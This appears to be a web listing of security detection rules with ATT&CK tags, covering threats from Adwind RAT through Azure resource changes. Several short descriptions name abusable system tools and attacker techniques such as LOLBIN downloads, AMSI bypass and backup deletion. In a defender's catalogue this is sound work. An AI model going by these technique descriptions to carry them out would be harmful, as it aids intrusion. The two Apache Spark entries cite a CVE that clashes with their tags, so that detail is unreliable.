    calendar Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects javaw.exe in AppData folder as used by Adwind / JRAT


    Read More
  • Adwind RAT / JRAT File Artifact

    calendar Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detects javaw.exe in AppData folder as used by Adwind / JRAT


    Read More
  • AgentExecutor PowerShell Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument


    Read More
  • All Backups Deleted Via Wbadmin.EXE

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.


    Read More
  • Allow RDP Remote Assistance Feature

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect enable rdp feature to allow specific user to rdp connect on the targeted machine


    Read More
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

    calendar Aug 12, 2024 · attack.persistence attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.


    Read More
  • Alternate PowerShell Hosts - PowerShell Module

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe


    Read More
  • Always Install Elevated MSI Spawned Cmd And Powershell

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"


    Read More
  • AMSI Bypass Pattern Assembly GetType

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts


    Read More
  • Amsi.DLL Loaded Via LOLBIN Process

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack


    Read More
  • Anomalous Token

    calendar Aug 12, 2024 · attack.t1528 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.


    Read More
  • Anomalous User Activity

    calendar Aug 12, 2024 · attack.t1098 attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.


    Read More
  • Anonymous IP Address

    calendar Aug 12, 2024 · attack.t1528 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.


    Read More
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .


    Read More
  • Anydesk Temporary Artefact

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • Apache Segmentation Fault

    calendar Aug 12, 2024 · attack.impact attack.t1499.004  ·
    Share on: twitter facebook linkedin copy

    Detects a segmentation fault error message caused by a crashing apache worker process


    Read More
  • Apache Spark Shell Command Injection - ProcessCreation

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective


    Read More
  • Apache Spark Shell Command Injection - Weblogs

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective


    Read More
  • Apache Threading Error

    calendar Aug 12, 2024 · attack.initial-access attack.lateral-movement attack.t1190 attack.t1210  ·
    Share on: twitter facebook linkedin copy

    Detects an issue in apache logs that reports threading related errors


    Read More
  • App Granted Microsoft Permissions

    calendar Aug 12, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD


    Read More
  • App Granted Privileged Delegated Or App Permissions

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003  ·
    Share on: twitter facebook linkedin copy

    Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions


    Read More
  • Application AppID Uri Configuration Changes

    calendar Aug 12, 2024 · attack.persistence attack.credential-access attack.privilege-escalation attack.t1552 attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a configuration change is made to an applications AppID URI.


    Read More
  • Application Removed Via Wmic.EXE

    calendar Aug 12, 2024 · attack.execution attack.t1047  ·
    Share on: twitter facebook linkedin copy

    Detects the removal or uninstallation of an application via "Wmic.EXE".


    Read More
  • Application Terminated Via Wmic.EXE

    calendar Aug 12, 2024 · attack.execution attack.t1047  ·
    Share on: twitter facebook linkedin copy

    Detects calls to the "terminate" function via wmic in order to kill an application


    Read More
  • Application Uninstalled

    calendar Aug 12, 2024 · attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    An application has been removed. Check if it is critical.


    Read More
  • Application URI Configuration Changes

    calendar Aug 12, 2024 · attack.t1528 attack.t1078.004 attack.persistence attack.credential-access attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.


    Read More
  • Application Using Device Code Authentication Flow

    calendar Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.


    Read More
  • Applications That Are Using ROPC Authentication Flow

    calendar Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.


    Read More
  • AppX Package Installation Attempts Via AppInstaller.EXE

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL


    Read More
  • APT PRIVATELOG Image Load Pattern

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances


    Read More
  • APT User Agent

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious user agent strings used in APT malware in proxy logs


    Read More
  • APT29 2018 Phishing Campaign CommandLine Indicators

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant


    Read More
  • APT29 2018 Phishing Campaign File Indicators

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant


    Read More
  • APT31 Judgement Panda Activity

    calendar Aug 12, 2024 · attack.lateral-movement attack.credential-access attack.g0128 attack.t1003.001 attack.t1560.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report


    Read More
  • APT40 Dropbox Tool User Agent

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious user agent string of APT40 Dropbox tool


    Read More
  • Arbitrary Binary Execution Using GUP Utility

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the Notepad++ updater (gup) to launch other commands or executables


    Read More
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.


    Read More
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.


    Read More
  • Arbitrary File Download Via GfxDownloadWrapper.EXE

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.


    Read More
  • Arbitrary File Download Via MSOHTMED.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "MSOHTMED" to download arbitrary files


    Read More
  • Arbitrary File Download Via MSPUB.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files


    Read More
  • Arbitrary File Download Via PresentationHost.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files


    Read More
  • Arbitrary MSI Download Via Devinit.EXE

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system


    Read More
  • Arbitrary Shell Command Execution Via Settingcontent-Ms

    calendar Aug 12, 2024 · attack.t1204 attack.t1566.001 attack.execution attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.


    Read More
  • Arcadyan Router Exploitations

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-20090 cve.2021-20091 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.


    Read More
  • AspNetCompiler Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1127  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.


    Read More
  • Assembly DLL Creation Via AspNetCompiler

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.


    Read More
  • Assembly Loading Via CL_LoadAssembly.ps1

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.


    Read More
  • Atbroker Registry Change

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.persistence attack.t1547  ·
    Share on: twitter facebook linkedin copy

    Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'


    Read More
  • Atera Agent Installation

    calendar Aug 12, 2024 · attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators


    Read More
  • Atlassian Bitbucket Command Injection Via Archive API

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-36804 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804


    Read More
  • Atlassian Confluence CVE-2022-26134

    calendar Aug 12, 2024 · attack.initial-access attack.execution attack.t1190 attack.t1059 cve.2022-26134  ·
    Share on: twitter facebook linkedin copy

    Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134


    Read More
  • Atypical Travel

    calendar Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.


    Read More
  • Audio Capture

    calendar Aug 12, 2024 · attack.collection attack.t1123  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to record audio with arecord utility


    Read More
  • Audio Capture via PowerShell

    calendar Aug 12, 2024 · attack.collection attack.t1123  ·
    Share on: twitter facebook linkedin copy

    Detects audio capture via PowerShell Cmdlet.


    Read More
  • Audio Capture via SoundRecorder

    calendar Aug 12, 2024 · attack.collection attack.t1123  ·
    Share on: twitter facebook linkedin copy

    Detect attacker collecting audio via SoundRecorder application.


    Read More
  • Audit CVE Event

    calendar Aug 12, 2024 · attack.execution attack.t1203 attack.privilege-escalation attack.t1068 attack.defense-evasion attack.t1211 attack.credential-access attack.t1212 attack.lateral-movement attack.t1210 attack.impact attack.t1499.004  ·
    Share on: twitter facebook linkedin copy

    Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.


    Read More
  • Audit Policy Tampering Via Auditpol

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.


    Read More
  • Audit Policy Tampering Via NT Resource Kit Auditpol

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.


    Read More
  • Auditing Configuration Changes on Linux Host

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.006  ·
    Share on: twitter facebook linkedin copy

    Detect changes in auditd configuration files


    Read More
  • Authentications To Important Apps Using Single Factor Authentication

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detect when authentications to important application(s) only required single-factor authentication


    Read More
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell

    calendar Aug 12, 2024 · attack.discovery attack.t1217  ·
    Share on: twitter facebook linkedin copy

    Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.


    Read More
  • Automated Collection Command PowerShell

    calendar Aug 12, 2024 · attack.collection attack.t1119  ·
    Share on: twitter facebook linkedin copy

    Once established within a system or network, an adversary may use automated techniques for collecting internal data.


    Read More
  • Automated Collection Command Prompt

    calendar Aug 12, 2024 · attack.collection attack.t1119 attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Once established within a system or network, an adversary may use automated techniques for collecting internal data.


    Read More
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)


    Read More
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)


    Read More
  • AWS CloudTrail Important Change

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling, deleting and updating of a Trail


    Read More
  • AWS Config Disabling Channel/Recorder

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects AWS Config Service disabling


    Read More
  • AWS EC2 Disable EBS Encryption

    calendar Aug 12, 2024 · attack.impact attack.t1486 attack.t1565  ·
    Share on: twitter facebook linkedin copy

    Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.


    Read More
  • AWS EC2 Startup Shell Script Change

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.t1059.003 attack.t1059.004  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.


    Read More
  • AWS EC2 VM Export Failure

    calendar Aug 12, 2024 · attack.collection attack.t1005 attack.exfiltration attack.t1537  ·
    Share on: twitter facebook linkedin copy

    An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.


    Read More
  • AWS ECS Task Definition That Queries The Credential Endpoint

    calendar Aug 12, 2024 · attack.persistence attack.t1525  ·
    Share on: twitter facebook linkedin copy

    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.


    Read More
  • AWS EFS Fileshare Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.


    Read More
  • AWS EFS Fileshare Mount Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1485  ·
    Share on: twitter facebook linkedin copy

    Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.


    Read More
  • AWS EKS Cluster Created or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1485  ·
    Share on: twitter facebook linkedin copy

    Identifies when an EKS cluster is created or deleted.


    Read More
  • AWS ElastiCache Security Group Created

    calendar Aug 12, 2024 · attack.persistence attack.t1136 attack.t1136.003  ·
    Share on: twitter facebook linkedin copy

    Detects when an ElastiCache security group has been created.


    Read More
  • AWS ElastiCache Security Group Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Identifies when an ElastiCache security group has been modified or deleted.


    Read More
  • AWS Glue Development Endpoint Activity

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects possible suspicious glue development endpoint activity.


    Read More
  • AWS GuardDuty Important Change

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.


    Read More
  • AWS IAM Backdoor Users Keys

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.


    Read More
  • AWS IAM S3Browser LoginProfile Creation

    calendar Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.


    Read More
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation

    calendar Aug 12, 2024 · attack.execution attack.t1059.009 attack.persistence attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".


    Read More
  • AWS IAM S3Browser User or AccessKey Creation

    calendar Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects S3 Browser utility creating IAM User or AccessKey.


    Read More
  • AWS Identity Center Identity Provider Change

    calendar Aug 12, 2024 · attack.persistence attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.


    Read More
  • AWS RDS Master Password Change

    calendar Aug 12, 2024 · attack.exfiltration attack.t1020  ·
    Share on: twitter facebook linkedin copy

    Detects the change of database master password. It may be a part of data exfiltration.


    Read More
  • AWS Root Credentials

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects AWS root account usage


    Read More
  • AWS Route 53 Domain Transfer Lock Disabled

    calendar Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.


    Read More
  • AWS Route 53 Domain Transferred to Another Account

    calendar Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when a request has been made to transfer a Route 53 domain to another AWS account.


    Read More
  • AWS S3 Data Management Tampering

    calendar Aug 12, 2024 · attack.exfiltration attack.t1537  ·
    Share on: twitter facebook linkedin copy

    Detects when a user tampers with S3 data management in Amazon Web Services.


    Read More
  • AWS SecurityHub Findings Evasion

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects the modification of the findings on SecurityHub.


    Read More
  • AWS Snapshot Backup Exfiltration

    calendar Aug 12, 2024 · attack.exfiltration attack.t1537  ·
    Share on: twitter facebook linkedin copy

    Detects the modification of an EC2 snapshot's permissions to enable access from another account


    Read More
  • AWS STS AssumeRole Misuse

    calendar Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001  ·
    Share on: twitter facebook linkedin copy

    Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.


    Read More
  • AWS STS GetSessionToken Misuse

    calendar Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001  ·
    Share on: twitter facebook linkedin copy

    Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.


    Read More
  • AWS Suspicious SAML Activity

    calendar Aug 12, 2024 · attack.initial-access attack.t1078 attack.lateral-movement attack.t1548 attack.privilege-escalation attack.t1550 attack.t1550.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.


    Read More
  • AWS User Login Profile Was Modified

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.


    Read More
  • Azure Active Directory Hybrid Health AD FS New Server

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1578  ·
    Share on: twitter facebook linkedin copy

    This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.


    Read More
  • Azure Active Directory Hybrid Health AD FS Service Delete

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1578.003  ·
    Share on: twitter facebook linkedin copy

    This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.


    Read More
  • Azure AD Account Credential Leaked

    calendar Aug 12, 2024 · attack.t1589 attack.reconnaissance  ·
    Share on: twitter facebook linkedin copy

    Indicates that the user's valid credentials have been leaked.


    Read More
  • Azure AD Health Monitoring Agent Registry Keys Access

    calendar Aug 12, 2024 · attack.discovery attack.t1012  ·
    Share on: twitter facebook linkedin copy

    This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.


    Read More
  • Azure AD Health Service Agents Registry Keys Access

    calendar Aug 12, 2024 · attack.discovery attack.t1012  ·
    Share on: twitter facebook linkedin copy

    This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.


    Read More
  • Azure AD Only Single Factor Authentication Required

    calendar Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1556.006  ·
    Share on: twitter facebook linkedin copy

    Detect when users are authenticating without MFA being required.


    Read More
  • Azure AD Threat Intelligence

    calendar Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Indicates user activity that is unusual for the user or consistent with known attack patterns.


    Read More
  • Azure Application Credential Modified

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a application credential is modified.


    Read More
  • Azure Application Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    Identifies when a application is deleted in Azure.


    Read More
  • Azure Application Gateway Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a application gateway is modified or deleted.


    Read More
  • Azure Application Security Group Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a application security group is modified or deleted.


    Read More
  • Azure Container Registry Created or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when a Container Registry is created or deleted.


    Read More
  • Azure Device No Longer Managed or Compliant

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a device in azure is no longer managed or compliant


    Read More
  • Azure Device or Configuration Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1485 attack.t1565.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when a device or device configuration in azure is modified or deleted.


    Read More
  • Azure DNS Zone Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1565.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when DNS zone is modified or deleted.


    Read More
  • Azure Domain Federation Settings Modified

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Identifies when an user or application modified the federation settings on the domain.


    Read More
  • Azure Firewall Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Identifies when a firewall is created, modified, or deleted.


    Read More
  • Azure Firewall Rule Collection Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.


    Read More
  • Azure Firewall Rule Configuration Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Firewall Rule Configuration is Modified or Deleted.


    Read More
  • Azure Key Vault Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when a key vault is modified or deleted.


    Read More
  • Azure Keyvault Key Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Keyvault Key is modified or deleted in Azure.


    Read More
  • Azure Keyvault Secrets Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Identifies when secrets are modified or deleted in Azure.


    Read More
  • Azure Kubernetes Admission Controller
